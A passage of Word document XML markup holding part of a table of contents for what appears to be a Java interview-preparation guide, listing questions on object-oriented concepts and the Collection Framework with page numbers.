              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>171</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7C244CDD" w14:textId="77B314E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9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Composition in Oops?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307595 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>172</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="17A5B8FE" w14:textId="180E41C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9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Composition and Aggregation?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307596 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>173</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4BB6A1BE" w14:textId="5101E6B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9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arent and child class methods and how to access those?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307597 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>174</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3867DC14" w14:textId="3041D9A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9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interface and abstract class?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307598 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>175</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0372ADE2" w14:textId="1D0BB45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59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ere will you use interface and abstract class with real time examples?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307599 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>176</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="61855692" w14:textId="090C74E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0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Compile time and Run time polymorphism?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307600 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>177</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="535703F7" w14:textId="09C0CC5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0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method overriding?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307601 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>179</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4C400E45" w14:textId="2472119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0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achieve method overriding?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307602 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>180</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="50704A5A" w14:textId="50235B7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0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method overloading?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307603 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>181</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7EE13E00" w14:textId="56F954E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0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Polymorphism? Explain with an example?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307604 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>183</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="22148801" w14:textId="702EFFD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0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Inheritance?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307605 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>185</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="08B2478A" w14:textId="3E463AA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0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interface in java?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307606 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>187</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3A6F1CF3" w14:textId="2A82E55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0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Can we have a static method inside the interface?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307607 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>189</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="53B6695F" w14:textId="216BAE8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0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Can we override the static method?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307608 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>190</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="17F54C36" w14:textId="7D1BA5C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0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e have Class A and Class B which contains m1() method in both the class, and class B extends parent class A. Asked which method will get called on which object?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307609 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>191</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="38798045" w14:textId="02CCEFC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1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SOLID Principles?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307610 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>192</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="283AA9F0" w14:textId="126043B2" w:rsidR="00012799" w:rsidRDefault="00012799">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10194"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc196307611" w:history="1">
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Collection Framework</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307611 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>196</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6D9631FA" w14:textId="4B24675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1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List and Array?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307612 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>196</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="36084333" w14:textId="271A96E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1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List and Set?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307613 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>196</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7606CD45" w14:textId="430983A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1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List and Map?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307614 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>198</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7DFDD6C9" w14:textId="1544A88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1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ArrayList and LinkedList?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307615 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>200</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0E25CDA4" w14:textId="274F43B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1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Array and Collections?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307616 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>202</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5B4EC05A" w14:textId="279ECA7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1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HashMap and LinkedHashMap?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307617 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>205</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="77362A3D" w14:textId="13E6043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1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HashMap and HashTable?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307618 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>208</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="73FF556D" w14:textId="7208A78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1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Fail-Fast and Fail-Safe iterator?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307619 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
